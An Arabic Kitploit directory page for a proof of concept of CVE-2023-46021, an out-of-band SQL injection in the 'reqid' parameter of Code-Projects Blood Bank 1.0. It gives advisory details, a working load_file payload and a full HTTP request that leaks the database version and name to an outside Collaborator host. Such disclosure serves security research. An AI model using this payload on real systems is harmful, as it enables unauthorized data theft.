Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2023-46021-Code-Projects-Blood-Bank-1.0-SQL-Injection-Vulnerability — إثبات مفهوم استغلال لحقن SQL خارج النطاق في Code-Projects Blood Bank V1.0 عبر معامل reqid، مما يتيح استخراج إصدار قاعدة البيانات والبيانات من خلال Burp Collaborator. | Kitploit
أدوات/GitHubGitHub/ersinerenler/cve-2023-46021-code-projects-blood-bank-1.0-sql-injection-vulnerability
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويبجمع المعلوماتاختبار الاختراق
GitHubersinerenler/cve-2023-46021-code-projects-blood-bank-1.0-sql-injection-vulnerability

CVE-2023-46021-Code-Projects-Blood-Bank-1.0-SQL-Injection-Vulnerability

إثبات مفهوم استغلال لحقن SQL خارج النطاق في Code-Projects Blood Bank V1.0 عبر معامل reqid، مما يتيح استخراج إصدار قاعدة البيانات والبيانات من خلال Burp Collaborator.

عرض المستودع
2منذ 2 سنواتلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2023-46021-Code-Projects-Blood-Bank-1.0-OOB-SQL-Injection-Vulnerability

  • مؤلف الاستغلال: ersinerenler

الصفحة الرئيسية للمطور

  • https://code-projects.org/blood-bank-in-php-with-source-code

رابط البرنامج

  • https://download-media.code-projects.org/2020/11/Blood_Bank_In_PHP_With_Source_code.zip

نظرة عامة

  • يتعرض بنك الدم Blood Bank V1.0 من Code-Projects لثغرة أمنية خطيرة تتعلق بحقن SQL خارج النطاق (Out-of-Band SQL Injection) من خلال معامل 'reqid' في ملف /cancel.php. تنشأ هذه الثغرة بسبب غياب آليات الحماية المناسبة، مما يتيح للمهاجمين إساءة استخدام المعامل وتنفيذ هجمات حقن SQL خارج النطاق عبر Burp Collaborator. وقد يؤدي ذلك إلى وصول غير مصرح به واستخراج معلومات حساسة من قواعد البيانات.

تفاصيل الثغرة

  • CVE ID: CVE-2023-46021
  • الإصدار المتأثر: Blood Bank V1.0
  • الملف المعرض للثغرة: /cancel.php
  • اسم المعامل: reqid
  • نوع الهجوم: محلي

المراجع:

  • https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-46021
  • https://nvd.nist.gov/vuln/detail/CVE-2023-46021

الوصف

  • معامل 'reqid' في ملف /cancel.php من Code-Projects Blood Bank V1.0 معرض لحقن SQL خارج النطاق. تنبع هذه الثغرة من آليات حماية غير كافية، مما يسمح للمهاجمين باستغلال المعامل عبر Burp Collaborator لشن هجمات حقن SQL خارج النطاق. ومن خلال هذه التقنية، يمكن للمهاجم استخراج معلومات حساسة من قواعد البيانات.

إثبات المفهوم (PoC):

  • اعترض الطلب المرسل إلى cancel.php عبر Burp Suite
  • احقن الحمولة في المعاملات المعرضة للثغرة
  • الحمولة: 4'%2b(select%20load_file(concat('\\\\',version(),'.',database(),'.collaborator-domain\\a.txt')))%2b+'
  • مثال لطلب معامل reqid
root@kitploit:~
---
GET /bloodbank/file/cancel.php?reqid=4'%2b(select%20load_file(concat('\\\\',version(),'.',database(),'.7mus27hip62tznk3gy4n7z3fo6uxin6c.oastify.com\\a.txt')))%2b+' HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/119.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: close
Referer: http://localhost/bloodbank/sentrequest.php?msg=You%20have%20requested%20for%20blood%20group%20A+.%20Our%20team%20will%20contact%20you%20soon.
Cookie: PHPSESSID=<some-cookie-value>
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
---
  • تم التقاط معلومات قاعدة البيانات والإصدار عبر Burp Suite Collaborator
صورة
تنزيل الأداة